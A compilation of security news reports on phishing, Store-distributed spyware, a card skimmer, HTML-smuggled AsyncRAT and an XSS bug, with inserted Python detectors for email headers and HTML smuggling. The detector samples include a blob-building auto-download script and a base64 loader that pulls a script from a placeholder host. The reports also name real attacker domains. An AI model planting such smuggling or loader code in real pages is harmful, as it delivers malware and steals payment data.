Threat actors most likely tried to imitate Microsoft Technical Support and deceive users with a look-alike domain. The script intercepts the user's credentials and sends them to the server with a POST request: login and password are sent to a script on jbdelmarket[.]com via HTTP POST. A series of scripts that check the victim's IP address is also hosted on jbdelmarket[.]com. The phishing emails' headers include multiple domain names with SPF and DKIM records.

The Return-Path field in the phishing email was set to another address controlled by the attackers, which collects data about emails that could not be delivered. The Return-Path specifies where rejected emails are sent, so it is used to process bounces.
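As an added defender-side example (not code from the original post or from the vendor that analysed the campaign), the Python triage routine below checks a raw message for the header traits described here: a Return-Path under a domain other than the visible sender, a long chain of relay hops, an HTML attachment in a message whose text body carries no URL, and no authentication results. The sample message, its hosts, addresses and IPs are all constructed placeholders.

```python
from email import message_from_string
from email.utils import parseaddr

def _domain(header_value: str) -> str:
    """Lower-cased domain of an address header such as From or Return-Path."""
    addr = parseaddr(header_value or "")[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def triage_headers(raw: str, max_hops: int = 3) -> dict:
    """Flag the traits described above: Return-Path under a different domain than
    the visible sender, a long relay chain, an HTML attachment in a message whose
    text body carries no URL, and a missing Authentication-Results header."""
    msg = message_from_string(raw)
    from_dom, rp_dom = _domain(msg["From"]), _domain(msg["Return-Path"])
    hops = msg.get_all("Received", [])
    findings = []
    if rp_dom and rp_dom != from_dom:
        findings.append(f"Return-Path domain {rp_dom} differs from From domain {from_dom}")
    if len(hops) > max_hops:
        findings.append(f"{len(hops)} relay hops (more than {max_hops})")
    if "Authentication-Results" not in msg:
        findings.append("no Authentication-Results header: SPF/DKIM alignment unverified")
    html_attachments, body_has_url = [], False
    for part in msg.walk():
        fname = part.get_filename()
        if fname and fname.lower().endswith((".html", ".htm")):
            html_attachments.append(fname)
        elif part.get_content_type().startswith("text/"):
            text = part.get_payload(decode=True).decode("utf-8", errors="replace")
            body_has_url = body_has_url or "http" in text.lower()
    if html_attachments and not body_has_url:
        findings.append(f"HTML attachment(s) {html_attachments} with no URL in the body")
    return {"from_domain": from_dom, "return_path_domain": rp_dom,
            "hops": len(hops), "findings": findings}

# Constructed sample modelled on the campaign above; hosts, addresses and IPs
# are placeholders (.example domains, RFC 5737 documentation ranges).
SAMPLE = """\
Return-Path: <bounces@rp-collector.example>
Received: from relay4.example.net ([203.0.113.9]) by mx.victim.example; Mon, 18 Apr 2022 09:12:01 -0400
Received: from relay3.example.org ([198.51.100.7]) by relay4.example.net; Mon, 18 Apr 2022 09:11:58 -0400
Received: from relay2.example.com ([192.0.2.4]) by relay3.example.org; Mon, 18 Apr 2022 09:11:55 -0400
Received: from relay1.example.com ([192.0.2.2]) by relay2.example.com; Mon, 18 Apr 2022 09:11:50 -0400
From: "IRS Notices" <notices@gov-vendor.example>
Subject: Outstanding IRS payment
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Your IRS payment is overdue. Please review the attached invoice.
--b1
Content-Type: text/html; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"

<html><body>placeholder for the obfuscated invoice page</body></html>
--b1--
"""
```

A Return-Path domain that differs from the From domain is routine for legitimate bulk senders, so treat these findings as triage signals to combine with SPF, DKIM and DMARC results rather than as a verdict.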

Spyware Infests the Microsoft Store with Classic Game Pirates

 



Electron Bot, a malware which infiltrated Microsoft's Official Store via clones of popular games like Subway Surfer and Temple Run, infected approximately 5,000 machines in Sweden, Israel, Spain, and Bermuda. 

Check Point discovered and studied the malware, a backdoor that gives attackers broad control over infected PCs, allowing remote command execution and real-time interaction. The threat actors' purpose is social media promotion and fraud, achieved by taking control of social media profiles: Electron Bot can register new accounts, comment, and like.

An initial Electron Bot variant was uploaded to the Microsoft Store as "Album by Google Photos," published by a fake Google LLC business, and the operation was identified at the end of 2018. The malware, named after the Electron framework, can mimic natural browsing behavior and act as if it were a real website visitor. It accomplishes this by opening a new hidden browser window with the Electron framework's Chromium engine, setting the relevant HTTP headers, rendering the requested HTML page, and finally performing mouse actions.

Threat actors build rogue websites and use search engine optimization strategies to push them to the top of search results in an SEO poisoning campaign. SEO poisoning is also offered as a service to raise other websites' rankings, in addition to boosting the bad sites' own rankings. The infection chain starts when the user downloads one of the infected apps from the Microsoft Store, otherwise a reliable source of software. When the application is launched, a JavaScript dropper is dynamically loaded to fetch and install the Electron Bot payload.

The malware connects to its C2 (Electron Bot[.]s3[.]eu-central-1[.]amazonaws[.]com or 11k[.]online), retrieves its configuration, and executes any queued commands at the next system startup. The JS files dropped on the machine are relatively short and appear benign because the main scripts are loaded dynamically at run time.

Fraud, fleeceware, and financial trojans abound in official app stores. The Xenomorph banking malware was recently found by ThreatFabric, and perhaps the most ironic case is Vultur, a trojan hidden inside a fully functional two-factor authentication (2FA) app that recently infected 10,000 people who downloaded it from Google Play.

The successful entry of Electron Bot into Microsoft's official app store is only the most recent example of how consumers throw caution to the wind whenever a shiny new toy appears in an app store.

Credit Cards Stolen from a Prominent e-Cigarette Store

 

Element Vape, a well-known online retailer of e-cigarettes and vaping kits, has been harboring a credit card skimmer on its website since being breached. Through both retail and online storefronts in the United States and Canada, this retailer sells e-cigarettes, vaping equipment, e-liquids, and synthetic drugs.

The Element Vape website is loading a malicious file from a third-party site that appears to be a credit card stealer. Magecart refers to threat actors who steal credit card data from eCommerce sites by injecting skimming scripts.

On numerous shop pages, beginning with the homepage, a mysterious base64-encoded script can be seen at lines 45-50 of the HTML source. The skimmer has been present on ElementVape.com for an unknown period of time.

According to a Wayback Machine review of ElementVape.com, this code was absent as of February 5, 2022, and earlier. The infection therefore appears to have occurred after that date and before the time of detection. When decoded, the script simply fetches a JavaScript file from a third-party site:

/weicowire[.]com/js/jquery/frontend.js

When that script was in turn decoded and examined, its purpose was apparent: collecting credit card and billing information from customers during checkout. The script looks for email addresses, payment card details, phone numbers, and billing addresses (including street and ZIP codes).

The attacker receives this data via a predefined, obfuscated Telegram address in the script. The code also has anti-reverse-engineering features that check whether it is running in a sandbox or with "devtools" open, to prevent it from being examined.

It's unclear how the backend code of ElementVape.com was altered in the first place to allow the malicious script in. Reportedly, this isn't the first time Element Vape's security has been breached. Users reported receiving letters from Element Vape in 2018 indicating the company had suffered a data breach, with a "window of penetration between December 6, 2017, and June 27, 2018" that might have exposed users' personal details to threat actors.

Threat Advert is a New Service Strategy Invented by AsyncRAT

 

AsyncRAT is a Remote Access Tool (RAT) that uses a secure, encrypted connection to monitor and control other machines remotely. It is an open-source remote administration tool, but it has the potential to be misused because it includes features like keylogging, remote desktop control, and other functionality that could be used to harm the victim's PC. Furthermore, AsyncRAT can be distributed in a variety of ways, including spear phishing, malvertising, exploit kits, and other means.

Morphisec has detected a new, advanced distribution campaign that has been evading several security vendors; Morphisec caught it through breach prevention based on its Moving Target Defense technology.

Attackers are spreading AsyncRAT to targeted machines with a simple email phishing method using an HTML attachment. AsyncRAT is meant to remotely monitor and manipulate compromised systems through a protected, encrypted connection. This campaign ran for 4 to 5 months, with the lowest detection rates according to VirusTotal.

Victims received an email notification with an HTML attachment styled as a receipt, in many cases named Receipt-<digits>.html. When the victim opens the receipt, they are sent to a web page that prompts them to save a downloaded ISO file. The user assumes it is a routine file download that has passed through the usual port and network security scanning. That is not the case.

The ISO download is, in fact, created within the user's browser by the JavaScript code hidden within the HTML receipt file, rather than being downloaded from a remote server.
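As an added defender-side example (not code from the original post or from Morphisec), the Python triage below scans an HTML attachment for the in-browser file-assembly pattern described here, and also decodes long base64 literals to surface the kind of hidden loader URL seen in the Element Vape skimmer above. The indicator patterns, the sample pages, the loader URL and the receipt file name are all constructed for this example.

```python
import base64
import re

# Indicators of in-browser file assembly (HTML smuggling) and of base64-wrapped
# loader scripts. The patterns are written for this example, not taken from a vendor.
INDICATORS = {
    "base64_decode": re.compile(r"\batob\s*\("),
    "blob_build": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "forced_download": re.compile(r"\.download\s*="),
    "auto_click": re.compile(r"\.click\s*\(\s*\)"),
    "octet_stream": re.compile(r"application/octet-stream"),
}
SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def decode_text_literals(script: str) -> list:
    """Decode long base64 literals that turn out to be text (a hidden loader or
    nested script); binary blobs such as a smuggled ISO are skipped."""
    found = []
    for literal in B64_LITERAL.findall(script):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            found.append(text)
    return found

def scan_html(html: str) -> dict:
    """Heuristic triage of one HTML attachment for a mail gateway or sandbox:
    counts smuggling indicators inside <script>, notes any large base64 blob
    (the smuggled file itself) and surfaces URLs hidden in decoded literals."""
    hits, decoded = set(), []
    for body in SCRIPT_BODY.findall(html):
        hits.update(name for name, rx in INDICATORS.items() if rx.search(body))
        decoded.extend(decode_text_literals(body))
    big_blob = any(len(m) >= 1024 for m in B64_LITERAL.findall(html))
    urls = sorted({u for text in decoded for u in URL_RE.findall(text)})
    score = len(hits) + (2 if big_blob else 0) + (2 if urls else 0)
    return {"indicators": sorted(hits), "decoded_urls": urls, "big_blob": big_blob,
            "score": score, "verdict": "suspicious" if score >= 3 else "benign"}

# Constructed samples: the "ISO" is padding plus a CD001 marker, the loader URL
# is a placeholder, and the receipt name mirrors the naming described above.
_FAKE_ISO = base64.b64encode(b"\x00" * 2048 + b"\x01CD001\x01").decode()
SMUGGLED_ISO = f"""<html><body><script>
var data = "{_FAKE_ISO}";
var bytes = Uint8Array.from(atob(data), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: 'application/octet-stream'}});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob); a.download = 'Receipt-4471.iso'; a.click();
</script></body></html>"""
_LOADER = base64.b64encode(b"var s=document.createElement('script');"
                           b"s.src='https://loader.example/js/jquery/frontend.js';"
                           b"document.head.appendChild(s);").decode()
SKIMMER_LOADER = f"<html><body><script>eval(atob('{_LOADER}'));</script></body></html>"
BENIGN = "<html><body><script>document.title = 'Order 4471';</script></body></html>"
```

The score thresholds are deliberately simple; in a real pipeline the decoded URLs and the blob itself would be handed to reputation and sandbox checks rather than judged by count alone.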

To reduce the possibility of infection by AsyncRAT, users should take the following steps:
  • Keep antivirus signatures and engines up to date.
  • Enable automatic updates to ensure that the operating system has the most recent security fixes.
  • Do not make email addresses public on the internet.
  • Don't open email attachments with strange-looking extensions. When opening any email attachment, especially from an unknown sender, proceed with caution.
  • Exercise caution when opening emails with generic subject lines.

Phishing Attackers Spotted Using Morse Code to Avoid Detection

 

Microsoft has revealed details of a deceptive year-long social engineering campaign in which the operators changed their obfuscation and encryption mechanisms every 37 days on average, including using Morse code, in an attempt to hide their tracks and steal user credentials. 

One of numerous tactics employed by the hackers, who Microsoft did not name, to disguise harmful software was Morse Code, a means of encoding characters with dots and dashes popularised by telegraph technology. It serves as a reminder that, despite their complexity, modern offensive and defensive cyber measures are generally based on the simple principle of hiding and cracking code. 

The phishing attempts take the shape of invoice-themed lures that imitate financial-related business transactions, with an HTML file ("XLS.HTML") attached to the emails. The ultimate goal is to collect usernames and passwords, which are then utilized as an initial point of access for subsequent infiltration attempts. 

Microsoft compared the attachment to a "jigsaw puzzle," explaining that individual pieces of the HTML file are designed to appear innocuous and slip past endpoint security software, only to reveal their true purpose when decoded and joined together. The company did not identify the hackers who carried out the attack.

"This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving," the Microsoft 365 Defender Threat Intelligence Team said in an analysis. "On their own, the individual segments of the HTML file may appear harmless at the code level and may thus slip past conventional security solutions."

When the attachment is opened, a counterfeit Microsoft Office 365 credentials dialogue box appears on top of a blurred Excel document in a browser window. The dialogue box asks recipients to sign in again because their access to the Excel document has allegedly expired. When a user types in a password, the user is told the password is incorrect, while the phishing kit quietly collects the credentials in the background. Since its discovery in July 2020, the campaign is reported to have gone through ten iterations, with the adversary periodically changing its encoding methods to hide the harmful nature of the HTML attachment and the many attack segments contained within the file.

According to Christian Seifert, lead research manager at Microsoft's M365 Security unit, the hackers have yet to be linked to a known group. “We believe it is one of the many cybercrime groups that defraud victims for profit,” Seifert said.

Google and Mozilla Develop an API for HTML Sanitization

 

Google, Mozilla, and Cure53 engineers have collaborated to create an application programming interface (API) that offers a comprehensive solution to HTML sanitization. The API will be used in upcoming versions of the Mozilla Firefox and Google Chrome web browsers. 

HTML sanitization is the process of reviewing an HTML document and creating a new HTML document that only contains the "secure" and desired tags. By sanitizing any HTML code submitted by a user, HTML sanitization can be used to defend against attacks like cross-site scripting (XSS).

Sanitization is usually carried out using either a whitelist or a blacklist strategy, and can be refined further with rules that define which operations should be performed on the matching tags.

When rendering user-generated content or working with templates, web applications are often expected to manage dynamic HTML content in the browser. Client-side HTML processing often introduces security flaws, which malicious actors exploit to stage XSS attacks, steal user data, or execute web commands on their behalf. 

“Historically, the web has been confronted with XSS issues ever since the inception of JavaScript,” Frederik Braun, security engineer at Mozilla, said. “The web has an increase in browser capabilities with new APIs and can thus be added to the attacker’s toolbox.” 

To protect against XSS attacks, many developers use open-source JavaScript libraries like DOMPurify. DOMPurify takes an HTML string as input and sanitizes it by removing or escaping potentially dangerous parts.

“The issue with parsing HTML is that it is a living standard and thus a quickly moving target,” Braun said. “To ensure that the HTML sanitizer works correctly on new input, it needs to keep up with this standard. The failure to do so can be catastrophic and lead to sanitizer bypasses.” 

The HTML Sanitizer API incorporates XSS security directly into the browser. The API's sanitizer class can be instantiated and used without the need to import external libraries. 

“This moves the responsibility for correct parsing into a piece of software that is already getting frequent security updates and has proven successful in doing it timely,” Braun said. According to Bentkowski, browsers already have built-in sanitizers for clipboard info, so repurposing the code to extend native sanitization capabilities makes perfect sense.

PayPal Suffered a Cross-Site Scripting (XSS) Vulnerability

 

The PayPal currency converter functionality was affected by a severe cross-site scripting (XSS) vulnerability. An attacker could run malicious scripts if the vulnerability were abused, injecting malicious JavaScript, HTML, or other content the browser would interpret. The bug was found on PayPal's web domain in the currency converter functionality of PayPal wallets.

On February 19, 2020, the vulnerability was first reported as a "reflected XSS and CSP bypass" issue by a security researcher who goes by the name "Cr33pb0y"; he was awarded a $2,900 bug bounty through HackerOne.

In a limited disclosure released on February 10, almost a year after the researcher privately reported the problem, PayPal said the flaw was in the currency conversion endpoint and was caused by a failure to adequately sanitize user input.

PayPal acknowledged the flaw in its response on HackerOne, attributing it to the currency conversion URL handling user input improperly. An attacker could use JavaScript injection to access the document object in a browser or append other malicious code to the URL. If hackers load a malicious payload into a victim's browser, they can steal data or use the machine to take control of the system. As a consequence, malicious payloads can run in the victim's browser page, within the Document Object Model (DOM), without the user's knowledge or consent.

Typically, XSS attacks reflect a script through a specific website into the victim's browser, and they often need the target to click a malicious link. Payloads can serve as a foothold in larger attacks or for stealing cookies, session tokens, or account information. Following the bug bounty hunter's disclosure, PayPal has implemented further validation to check user input in the currency exchange function and eliminate the errors.

XSS bugs are a frequent attack vector. Several recent data leaks have been linked to bugs of this kind, including what some analysts say was an XSS flaw.

PayPal said the vulnerability has been fixed "by implementing additional controls to validate and sanitize user input before being returned in the response."